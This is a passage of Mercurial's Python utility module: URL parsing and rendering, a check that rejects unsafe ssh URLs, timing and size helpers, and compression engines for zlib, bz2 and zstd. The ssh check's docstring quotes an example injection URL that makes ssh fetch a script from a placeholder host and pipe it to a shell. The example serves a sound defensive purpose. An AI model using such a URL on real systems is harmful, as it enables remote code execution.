        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            # local paths (and bundle paths) are emitted without quoting
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            s += '//'
            if hasdriveletter(self.path):
                s += '/'

        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'

        if self.host:
            if self.host.startswith('[') and self.host.endswith(']'):
                # bracketed IPv6 literal, emitted as is
                s += self.host
            else:
                s += urlreq.quote(self.host)
        if self.port:
            s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'

        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        # Render the URL with the credentials temporarily removed, then
        # put them back no matter what happened.
        saved = (self.user, self.passwd)
        try:
            self.user, self.passwd = None, None
            stripped = bytes(self)
        finally:
            self.user, self.passwd = saved
        if not self.user:
            return (stripped, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        uris = (stripped, self.host)
        return (stripped, (None, uris, self.user, self.passwd or ''))

    def isabs(self):
        if self.scheme and self.scheme != 'file':
            return True # remote URL
        if hasdriveletter(self.path):
            return True # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True # Windows UNC path
        # POSIX-style absolute path, or relative
        return self.path.startswith('/')

    def localpath(self):
        if self.scheme != 'file' and self.scheme != 'bundle':
            return self._origpath
        path = self.path or '/'
        # For Windows, we need to promote hosts containing drive
        # letters to paths with drive letters.
        if hasdriveletter(self._hostport):
            path = self._hostport + '/' + self.path
        elif (self.host is not None and self.path
              and not hasdriveletter(path)):
            path = '/' + path
        return path

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        if not self.scheme:
            return True
        return self.scheme == 'file' or self.scheme == 'bundle'
3077 3077
def hasscheme(path):
    """Tell whether path parses as a URL with a scheme."""
    parsed = url(path)
    return bool(parsed.scheme)
3080 3080
def hasdriveletter(path):
    """Tell whether path begins with a drive letter such as ``c:``.

    A false path (empty or None) is handed back unchanged.
    """
    if not path:
        return path
    return path[1:2] == ':' and path[0:1].isalpha()
3083 3083
def urllocalpath(path):
    """Return the local path for path, keeping query and fragment in it."""
    parsed = url(path, parsequery=False, parsefragment=False)
    return parsed.localpath()
3086 3086
def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the
    user.

    The check is done on the unquoted form of path, so a percent-encoded
    leading dash is caught as well.

    Raises an error.Abort when the url is unsafe.
    """
    path = urlreq.unquote(path)
    if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
        # bytestr() keeps the %r rendering free of a b'' prefix
        raise error.Abort(_('potentially unsafe url: %r') %
                          (pycompat.bytestr(path),))
3101 3101
def hidepassword(u):
    '''mask the password of a url string, if it has one'''
    parsed = url(u)
    if parsed.passwd:
        parsed.passwd = '***'
    return bytes(parsed)
3108 3108
def removeauth(u):
    '''remove all authentication information from a url string

    The result is rendered with bytes(), like hidepassword() does, so both
    helpers return the same kind of string.
    '''
    u = url(u)
    u.user = u.passwd = None
    return bytes(u)
3114 3114
# Formatter for durations given in seconds. Each row is passed to
# unitcountfn() as (multiplier, divisor, format).
timecount = unitcountfn(
    # seconds
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    # milliseconds
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    # microseconds
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    # nanoseconds
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )
3130 3130
# Current indentation of the timing report; a one-element list so that
# nested wrappers can update it in place.
_timenesting = [0]

def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''
    step = 2

    def wrapper(*args, **kwargs):
        begin = timer()
        _timenesting[0] += step
        try:
            return func(*args, **kwargs)
        finally:
            # runs on normal return and on exception alike
            elapsed = timer() - begin
            _timenesting[0] -= step
            padding = ' ' * _timenesting[0]
            stderr.write('%s%s: %s\n' %
                         (padding, func.__name__, timecount(elapsed)))
    return wrapper
3157 3157
# (suffix, multiplier) pairs, tried in this order.
_sizeunits = (
    ('m', 2**20),
    ('k', 2**10),
    ('g', 2**30),
    ('kb', 2**10),
    ('mb', 2**20),
    ('gb', 2**30),
    ('b', 1),
)

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    spec = s.strip().lower()
    try:
        for suffix, factor in _sizeunits:
            if not spec.endswith(suffix):
                continue
            amount = float(spec[:-len(suffix)])
            return int(amount * factor)
        # no unit suffix: a plain integer number of bytes
        return int(spec)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)
3179 3179
class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        # list of (source, hook) pairs
        self._hooks = []

    def add(self, source, hook):
        entry = (source, hook)
        self._hooks.append(entry)

    def __call__(self, *args):
        # the stored list itself is reordered by source name
        self._hooks.sort(key=lambda entry: entry[0])
        return [hook(*args) for _source, hook in self._hooks]
3197 3197
def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then return the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
      length of longest filepath+line number,
      filepath+linenumber,
      function

    Not be used in production code but very convenient while developing.
    '''
    # drop this generator's own frame plus the 'skip' frames below it
    frames = traceback.extract_stack()[:-skip - 1]
    entries = []
    for fn, ln, func, _text in frames:
        location = fileline % (pycompat.sysbytes(fn), ln)
        entries.append((location, pycompat.sysbytes(func)))
    # depth == 0 keeps everything, since [-0:] is the whole list
    entries = entries[-depth:]
    if not entries:
        return

    fnmax = max(len(location) for location, _func in entries)
    for fnln, func in entries:
        if line is None:
            yield (fnmax, fnln, func)
        else:
            yield line % (fnmax, fnln, func)
3220 3220
def debugstacktrace(msg='stacktrace', skip=0,
                    f=stderr, otherf=stdout, depth=0):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then show 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not be used in production code but very convenient while developing.
    '''
    if otherf:
        otherf.flush()
    header = '%s at:\n' % msg.rstrip()
    f.write(header)
    # one more frame is skipped so this function itself is left out
    for frameline in getstackframes(skip + 1, depth=depth):
        f.write(frameline)
    f.flush()
3235 3235
class dirs(object):
    '''a multiset of directory names from a dirstate or manifest'''

    def __init__(self, map, skip=None):
        # directory name -> reference count
        self._dirs = {}
        add = self.addpath
        if safehasattr(map, 'iteritems') and skip is not None:
            # leave out entries whose first state field equals skip
            for name, state in map.iteritems():
                if state[0] == skip:
                    continue
                add(name)
        else:
            for name in map:
                add(name)

    def addpath(self, path):
        counts = self._dirs
        for base in finddirs(path):
            if base in counts:
                # already known, so all of its ancestors are known too
                counts[base] += 1
                return
            counts[base] = 1

    def delpath(self, path):
        counts = self._dirs
        for base in finddirs(path):
            if counts[base] > 1:
                # still referenced, so the ancestors stay untouched
                counts[base] -= 1
                return
            del counts[base]

    def __iter__(self):
        return iter(self._dirs)

    def __contains__(self, d):
        return d in self._dirs

# use the implementation from the parsers module when it has one
if safehasattr(parsers, 'dirs'):
    dirs = parsers.dirs
3274 3274
def finddirs(path):
    """Yield every ancestor directory of path, longest first."""
    end = len(path)
    while True:
        end = path.rfind('/', 0, end)
        if end == -1:
            return
        yield path[:end]
3280 3280
3281 3281 # compression code
3282 3282
# Roles accepted when asking for wire protocol compression engines.
SERVERROLE = 'server'
CLIENTROLE = 'client'

# Wire protocol support declared by a compression engine.
compewireprotosupport = collections.namedtuple(
    u'compenginewireprotosupport',
    (u'name', u'serverpriority', u'clientpriority'))
3289 3289
class compressormanager(object):
    """Holds registrations of various compression engines.

    This class essentially abstracts the differences between compression
    engines to allow new compression formats to be added easily, possibly from
    extensions.

    Compressors are registered against the global instance by calling its
    ``register()`` method.
    """
    def __init__(self):
        self._engines = {}
        # Bundle spec human name to engine name.
        self._bundlenames = {}
        # Internal bundle identifier to engine name.
        self._bundletypes = {}
        # Revlog header to engine name.
        self._revlogheaders = {}
        # Wire proto identifier to engine name.
        self._wiretypes = {}

    def __getitem__(self, key):
        return self._engines[key]

    def __contains__(self, key):
        return key in self._engines

    def __iter__(self):
        return iter(self._engines.keys())

    def register(self, engine):
        """Register a compression engine with the manager.

        The argument must be a ``compressionengine`` instance.

        Raises ValueError for any other argument, and error.Abort when the
        engine name or one of its bundle, wire protocol or revlog identifiers
        is already taken. Nothing is recorded unless every check passes.
        """
        if not isinstance(engine, compressionengine):
            raise ValueError(_('argument must be a compressionengine'))

        name = engine.name()

        if name in self._engines:
            raise error.Abort(_('compression engine %s already registered') %
                              name)

        # Run all collision checks first. Only once they have all passed are
        # the lookup tables touched, so a failure cannot leave the engine
        # half registered.
        bundleinfo = engine.bundletype()
        if bundleinfo:
            bundlename, bundletype = bundleinfo

            if bundlename in self._bundlenames:
                raise error.Abort(_('bundle name %s already registered') %
                                  bundlename)
            if bundletype in self._bundletypes:
                raise error.Abort(_('bundle type %s already registered by %s') %
                                  (bundletype, self._bundletypes[bundletype]))

        wiresupport = engine.wireprotosupport()
        if wiresupport:
            wiretype = wiresupport.name
            if wiretype in self._wiretypes:
                raise error.Abort(_('wire protocol compression %s already '
                                    'registered by %s') %
                                  (wiretype, self._wiretypes[wiretype]))

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if bundleinfo:
            # No external facing name declared.
            if bundlename:
                self._bundlenames[bundlename] = name

            self._bundletypes[bundletype] = name

        if wiresupport:
            self._wiretypes[wiretype] = name

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def _ensureavailable(self, engine):
        """Return engine, aborting if it reports itself as unavailable."""
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        return self._ensureavailable(engine)

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        return self._ensureavailable(engine)

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return sorted(engines, key=getkey)

    def forwiretype(self, wiretype):
        """Obtain a compression engine registered to a wire protocol type.

        Will raise KeyError if the wire type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._wiretypes[wiretype]]
        return self._ensureavailable(engine)

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

compengines = compressormanager()
3445 3445
class compressionengine(object):
    """Base class for compression engines.

    Every compression engine implements the interface declared here.
    """
    def name(self):
        """Return the engine's name.

        The engine is registered under this key.

        Subclasses must implement this method.
        """
        raise NotImplementedError()

    def available(self):
        """Tell whether the engine can be used.

        This lets optional engines exist that are not usable in every
        installation, for example engines backed by a C extension that may
        be missing.
        """
        return True

    def bundletype(self):
        """Describe the bundle identifiers of this engine.

        Returns None when the engine cannot be used for bundles.

        Otherwise returns a 2-tuple of strings: the user-facing "bundle
        spec" compression name, and the internal identifier that marks the
        compression format inside bundles. Set the first element to
        ``None`` to keep the name out of external usage.

        An engine supporting bundle compression must also implement
        ``compressstream`` and ``decompressorreader``.

        The help system shows the docstring of this method to tell users
        about the engine.
        """
        return None

    def wireprotosupport(self):
        """Declare wire protocol support for this compression format.

        Returns None when the engine cannot compress wire protocol
        payloads.

        Otherwise returns a ``compenginewireprotosupport`` with these
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        Server and client use the integer priorities to order the formats
        they advertise, highest integer first. Non-positive integers are
        not advertised.

        The priority values are somewhat arbitrary and only give the
        default ordering; config options can change the relative order.

        An engine supporting wire protocol compression must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Return the header that marks revlog chunks of this engine.

        An engine usable for revlog compression returns the bytes that
        identify chunks it compressed. Any other engine returns ``None`` to
        show it takes no part in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        ``it`` is an iterator (ideally a generator) of chunks of bytes to
        compress. The result is an iterator (ideally a generator) of chunks
        of bytes holding the compressed output.

        ``opts`` optionally describes how to compress; each engine
        interprets it in its own way.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Decompress the data of a file object.

        ``fh`` is an object whose ``read(size)`` method returns compressed
        data. The result is an object whose ``read(size)`` returns the
        uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Return an object for compressing revlog entries.

        Its ``compress(data)`` method compresses binary data and returns
        the compressed binary data, or ``None`` when the data could not be
        compressed (too small, not compressible, etc). Returned data should
        start with a header that uniquely identifies this compression
        format, so that decompression can be routed to this engine; that
        header should be the ``revlogheader()`` return value.

        Its ``decompress(data)`` method decompresses data. It is only
        called when ``data`` begins with ``revlogheader()``, and should
        return the raw, uncompressed data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()
3562 3562
3563 3563 class _zlibengine(compressionengine):
3564 3564 def name(self):
3565 3565 return 'zlib'
3566 3566
3567 3567 def bundletype(self):
3568 3568 """zlib compression using the DEFLATE algorithm.
3569 3569
3570 3570 All Mercurial clients should support this format. The compression
3571 3571 algorithm strikes a reasonable balance between compression ratio
3572 3572 and size.
3573 3573 """
3574 3574 return 'gzip', 'GZ'
3575 3575
3576 3576 def wireprotosupport(self):
3577 3577 return compewireprotosupport('zlib', 20, 20)
3578 3578
3579 3579 def revlogheader(self):
3580 3580 return 'x'
3581 3581
3582 3582 def compressstream(self, it, opts=None):
3583 3583 opts = opts or {}
3584 3584
3585 3585 z = zlib.compressobj(opts.get('level', -1))
3586 3586 for chunk in it:
3587 3587 data = z.compress(chunk)
3588 3588 # Not all calls to compress emit data. It is cheaper to inspect
3589 3589 # here than to feed empty chunks through generator.
3590 3590 if data:
3591 3591 yield data
3592 3592
3593 3593 yield z.flush()
3594 3594
3595 3595 def decompressorreader(self, fh):
3596 3596 def gen():
3597 3597 d = zlib.decompressobj()
3598 3598 for chunk in filechunkiter(fh):
3599 3599 while chunk:
3600 3600 # Limit output size to limit memory.
3601 3601 yield d.decompress(chunk, 2 ** 18)
3602 3602 chunk = d.unconsumed_tail
3603 3603
3604 3604 return chunkbuffer(gen())
3605 3605
3606 3606 class zlibrevlogcompressor(object):
3607 3607 def compress(self, data):
3608 3608 insize = len(data)
3609 3609 # Caller handles empty input case.
3610 3610 assert insize > 0
3611 3611
3612 3612 if insize < 44:
3613 3613 return None
3614 3614
3615 3615 elif insize <= 1000000:
3616 3616 compressed = zlib.compress(data)
3617 3617 if len(compressed) < insize:
3618 3618 return compressed
3619 3619 return None
3620 3620
3621 3621 # zlib makes an internal copy of the input buffer, doubling
3622 3622 # memory usage for large inputs. So do streaming compression
3623 3623 # on large inputs.
3624 3624 else:
3625 3625 z = zlib.compressobj()
3626 3626 parts = []
3627 3627 pos = 0
3628 3628 while pos < insize:
3629 3629 pos2 = pos + 2**20
3630 3630 parts.append(z.compress(data[pos:pos2]))
3631 3631 pos = pos2
3632 3632 parts.append(z.flush())
3633 3633
3634 3634 if sum(map(len, parts)) < insize:
3635 3635 return ''.join(parts)
3636 3636 return None
3637 3637
3638 3638 def decompress(self, data):
3639 3639 try:
3640 3640 return zlib.decompress(data)
3641 3641 except zlib.error as e:
3642 3642 raise error.RevlogError(_('revlog decompress error: %s') %
3643 3643 forcebytestr(e))
3644 3644
3645 3645 def revlogcompressor(self, opts=None):
3646 3646 return self.zlibrevlogcompressor()
3647 3647
# Make the zlib engine available through the ``compengines`` registry.
compengines.register(_zlibengine())
3649 3649
class _bz2engine(compressionengine):
    # Engine built on the stdlib ``bz2`` module.

    def name(self):
        return 'bz2'

    # NOTE: this docstring is read at runtime by bundlecompressiontopics()
    # to build help text, so its wording is part of the program's output.
    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        # Generator yielding bzip2-compressed data for the chunks in ``it``.
        # The 'level' entry of ``opts`` defaults to 9.
        level = (opts or {}).get('level', 9)
        compressor = bz2.BZ2Compressor(level)
        for piece in it:
            out = compressor.compress(piece)
            # Skip calls that produced no output yet.
            if out:
                yield out

        yield compressor.flush()

    def decompressorreader(self, fh):
        # Feed every chunk read from ``fh`` through one BZ2Decompressor and
        # expose the result through chunkbuffer.
        def inflate():
            decompressor = bz2.BZ2Decompressor()
            for piece in filechunkiter(fh):
                yield decompressor.decompress(piece)

        return chunkbuffer(inflate())

compengines.register(_bz2engine())
3692 3692
class _truncatedbz2engine(compressionengine):
    # Decompress-only engine for bzip2 streams whose leading 'BZ' magic has
    # been stripped.

    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        # No user-facing name (first element is None), so
        # bundlecompressiontopics() skips this engine.
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        def gen():
            # The input stream doesn't have the 'BZ' header. So add it back.
            d = bz2.BZ2Decompressor()
            # BZ2Decompressor.decompress() needs bytes; an explicit bytes
            # literal is identical on Python 2 and also correct where '' is
            # a unicode string.
            d.decompress(b'BZ')
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_truncatedbz2engine())
3713 3713
class _noopengine(compressionengine):
    # Pass-through engine: data is neither compressed nor decompressed.

    def name(self):
        return 'none'

    # NOTE: this docstring is read at runtime by bundlecompressiontopics()
    # to build help text, so its wording is part of the program's output.
    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        # The input iterable is handed back untouched; ``opts`` is ignored.
        return it

    def decompressorreader(self, fh):
        # The file object itself already yields the payload.
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            # Always report "not compressed" by returning None.
            return None

    def revlogcompressor(self, opts=None):
        # ``opts`` is ignored; a new nooprevlogcompressor is built per call.
        compressor = self.nooprevlogcompressor()
        return compressor

compengines.register(_noopengine())
3748 3748
class _zstdengine(compressionengine):
    # Engine built on the optional ``zstd`` module shipped inside this
    # package; see _module for how availability is detected.

    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        # True only when the zstd module could be imported.
        return bool(self._module)

    # NOTE: this docstring is read at runtime by bundlecompressiontopics()
    # to build help text, so its wording is part of the program's output.
    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        # Generator yielding zstd-compressed data for the chunks in ``it``.
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        # Expose the decompressed content of ``fh`` through chunkbuffer.
        zstd = self._module
        dctx = zstd.ZstdDecompressor()
        return chunkbuffer(dctx.read_from(fh))

    class zstdrevlogcompressor(object):
        # Compress and decompress individual revlog chunks with zstd. The
        # compression and decompression contexts are created once and reused
        # for every call.

        def __init__(self, zstd, level=3):
            # Writing the content size adds a few bytes to the output. However,
            # it allows decompression to be more optimal since we can
            # pre-allocate a buffer to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level,
                                             write_content_size=True)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            # Returns the compressed bytes, or None when the input is shorter
            # than 50 bytes or the compressed output is not smaller than the
            # input.
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                return None

            elif insize <= 1000000:
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                # Large input: feed the compressor in slices of the
                # module-recommended input size.
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    # Chunks are bytes; join with an explicit bytes
                    # separator so this also works where '' is a unicode
                    # string.
                    return b''.join(chunks)
                return None

        def decompress(self, data):
            # Returns the decompressed bytes; any failure is reported as
            # error.RevlogError.
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                # Explicit bytes separator: with a unicode '' the join would
                # raise TypeError, which the handler below would misreport
                # as a decompression failure.
                return b''.join(chunks)
            except Exception as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        forcebytestr(e))

    def revlogcompressor(self, opts=None):
        # Build a revlog compressor bound to the loaded zstd module, using
        # the 'level' entry of ``opts`` (default 3).
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())
3877 3877
def bundlecompressiontopics():
    """Build help items for the available bundle compression engines.

    Returns a dict mapping each bundle type name to a placeholder object
    whose ``__doc__`` is the formatted help text. The object also carries
    the engine's original docstring (``_origdoc``) and the ``bundletype``
    method it came from (``_origfunc``).
    """
    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    topics = {}

    for enginename in compengines:
        engine = compengines[enginename]

        # Unavailable engines are skipped without asking for a bundle type.
        bundlespec = engine.bundletype() if engine.available() else None
        if not bundlespec or not bundlespec[0]:
            continue

        bundlename = bundlespec[0]
        origdoc = engine.bundletype.__doc__

        entry = docobject()
        # NOTE(review): whitespace inside this literal may have been
        # collapsed by the extraction this text came from -- confirm
        # against upstream.
        entry.__doc__ = pycompat.sysstr('``%s``\n %s') % (bundlename, origdoc)
        entry._origdoc = origdoc
        entry._origfunc = engine.bundletype

        topics[bundlename] = entry

    return topics
3909 3909
# Help objects produced by bundlecompressiontopics(), collected at import time.
i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut: short alias for debugstacktrace
dst = debugstacktrace
3914 3914
def safename(f, tag, ctx, others=None):
    """
    Pick a rename target for f that collides with nothing already known.

    f:      filename to rename
    tag:    a string tag that will be included in the new name
    ctx:    a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    The first candidate is ``f~tag``; if that is taken, ``f~tag~1``,
    ``f~tag~2``, ... are tried in order. The first candidate found in
    neither ctx nor others is returned.
    """
    taken = set() if others is None else others

    def candidates():
        # Plain form first, then an endless run of numbered variants.
        yield '%s~%s' % (f, tag)
        for n in itertools.count(1):
            yield '%s~%s~%s' % (f, tag, n)

    for fn in candidates():
        if not (fn in ctx or fn in taken):
            return fn
3937 3937
def readexactly(stream, n):
    '''return exactly n bytes from stream.read, aborting on a short read

    Raises error.Abort when stream.read(n) returns fewer than n bytes.
    '''
    data = stream.read(n)
    got = len(data)
    if got >= n:
        return data
    raise error.Abort(_("stream ended unexpectedly"
                        " (got %d bytes, expected %d)")
                      % (got, n))
3946 3946
def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the 2's complement representation, least significant group
    first.

    Raises error.ProgrammingError if ``value`` is negative.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError('negative value for uvarint: %d'
                                     % value)
    bits = value & 0x7f
    value >>= 7
    # Named ``encoded`` rather than ``bytes`` so the builtin is not shadowed.
    encoded = []
    while value:
        # More groups follow: emit this one with the continuation bit set.
        encoded.append(pycompat.bytechr(0x80 | bits))
        bits = value & 0x7f
        value >>= 7
    # Final (most significant) group has the continuation bit clear.
    encoded.append(pycompat.bytechr(bits))

    # bytechr() yields byte strings, so join with a bytes separator.
    return b''.join(encoded)
3983 3983
def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method. Bytes
    are consumed one at a time through readexactly() until one without the
    high bit set is seen.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    value = 0
    # Each successive byte contributes 7 bits, least significant group first.
    for shift in itertools.count(0, 7):
        octet = ord(readexactly(fh, 1))
